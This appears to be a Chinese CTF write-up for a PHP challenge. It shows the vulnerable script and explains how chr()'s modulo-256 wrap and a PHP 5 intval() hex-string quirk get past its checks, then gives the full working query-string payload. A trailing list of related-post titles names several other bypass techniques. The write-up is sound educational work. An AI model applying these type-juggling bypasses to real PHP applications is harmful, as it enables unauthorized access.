intval的绕过和chr的利用
题目
<?php
error_reporting(0);
$flag = 'OKOKOKOK' //老样子 自定义一个flag
$value = $_GET['value']; //接受value参数
$password = $_GET['password']; //接受get参数
$username = '';for ($i = 0; $i < count($value); ++$i) {if ($value[$i] > 32 && $value[$i] < 127) unset($value);else $username .= chr($value[$i]);if ($username == 'w3lc0me_To_xid1an' && intval($password) < 232 && intval($password + 1) > 233) {echo 'Hello '.$username.'!', '<br>', PHP_EOL;echo $flag, '<hr>';}
}highlight_file(__FILE__);
if ($value[$i] > 32 && $value[$i] < 127) unset($value);
else $username .= chr($value[$i]);
if ($username == 'w3lc0me_To_xid1an' && intval($password) < 232 && intval($password + 1) > 233) {echo 'Hello '.$username.'!', '<br>', PHP_EOL;echo $flag, '<hr>';
这里我们知道需要自己写个数组来chr取模 为w3lc0me_To_xid1an
1.chr为自动模256 所以我们可以在原来上加上256 绕过第一个判断先
2.intval()在处理16进制时存在问题,但强制转换时是正常的 来绕过第二个判断
intval(字符串)为0 但是intval(字符串+1) 会自动转换成数值的
php7里面修复了这个东西
value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=376&value[12]=361&value[13]=356&value[14]=305&value[15]=353&value[16]=366&password=0x123
intval的绕过和chr的利用相关推荐
- xposed绕过模拟器检测_利用Xposed躲过Xposed检测
越来越多的app对xposed进行了检测 通过分析了其中部分对xposed检查的代码,希望通过xposed的方式阻止xposed检测达到通用的目的. 一般检查手段有很多,楼主也没分析完,这里列举了几个 ...
- DLL简述,很有意思
转自https://blog.csdn.net/swort_177/article/details/5426848 在Windows世界中,有无数块活动的大陆,它们都有一个共同的名字--动态链接库.现 ...
- php绕过管理员登录,EspCMS后台登录绕过漏洞再利用
之前4月13日在360的漏洞平台提交过一次,当时给出了能计算出db_pscode的利用工具.db_pscode是安装的时候随机生成的一个字符串常量,保存在配置文件里.4月22日,官方发布了新版本,改进 ...
- HeapSpray+ROP绕过IE8的DEP防护 ——堆喷射技术利用超星老漏洞
感觉写的太水了,有空一定重新写一份更详细明白的.. 堆喷射技术已经发展很多个年头了,相关的研究也挺多的,虽然现在Win7.Win8系统下的利用越来越难,但是该技术仍然是可用的,比如最近新出的IE8 u ...
- WAF绕过“小迪安全课堂笔记”信息收集,漏洞发现,漏洞利用,权限控制
WAF绕过 思维导图(全) CC 攻击与 DDOS CC WAF 绕过-信息收集之反爬虫延时代理池技术 案例 Safedog-默认拦截机制分析绕过-未开CC WAF绕过-漏洞发现之代理池指纹被动探针 ...
- 浅谈CTF中各种花式绕过的小trick
文章目录 浅谈CTF中各种花式绕过的小trick 前言 md5加密bypass 弱比较绕过 方法一:0e绕过 方法二:数组绕过 强比较绕过 方法:数组绕过 md5碰撞绕过 方法:使用Fastcoll生 ...
- 绕过disable_functions
文章目录 前言 黑名单绕过 利用 LD_PRELOAD 环境变量 LD_PRELOAD 简介 利用条件 劫持 getuid() 劫持启动进程 演示过程 利用ShellShock(CVE-2014-62 ...
- 【文件上传漏洞绕过方式】
目录 前言 正文 总结 前言 目前,文件上传往往在业务中不可避免,也是极其容易出现上传漏洞.根据owasptop10中的排名,文件上传漏洞(属于攻击检测和防范不足)高居其中.今天和大家分享常见的文件上 ...
- WordPress Editorial Calendar插件权限安全绕过漏洞
漏洞名称: WordPress Editorial Calendar插件权限安全绕过漏洞 CNNVD编号: CNNVD-201302-369 发布时间: 2013-02-22 更新时间: 2013-0 ...
最新文章
- python学不会的表情包-小学生绞尽脑汁也学不会的python(反射)
- 方案 mysql 优点_mysql高可用方案分析
- J.U.C系列(一)CountDownLatch的使用
- python经典排序_python实现十大经典排序算法
- html背景图片自适应纵向,HTML5 body设置全屏背景图片 如何让body的背景图片自适应整个屏----实战经验...
- mysql generaton_Mysql 集成随机唯一id mysql unique number generation
- Android 功耗(3)---高通功耗问题分析方法
- 从程序员到项目经理(24):慎于问敏于行 - 忠于工作不等于奴性
- 精英主板bios_各品牌主板和品牌电脑启动项与bios启动键大全!!值得收藏
- 求定积分 c++实现
- windows是第几代计算机,第几代cpu不支持win7?全面分析第几代cpu不支持win7
- avc 转 hevc
- 计数oracle,SQL数据透视表子组计数
- Python基础之面向对象基础
- 正运动学及逆运动学求解方法
- CDN基于谷歌开源Katran四层负载均衡方案的应用 - 原理篇
- 强弩之末,刘强东草根创业恐难迎圆满结局?
- c++获取mac操作系统的版本号
- 计算机组成原理XXH是什么,计算机组成原理第二次实验报告.doc
- 计算机考研如何寻找调剂信息?我这有最全的!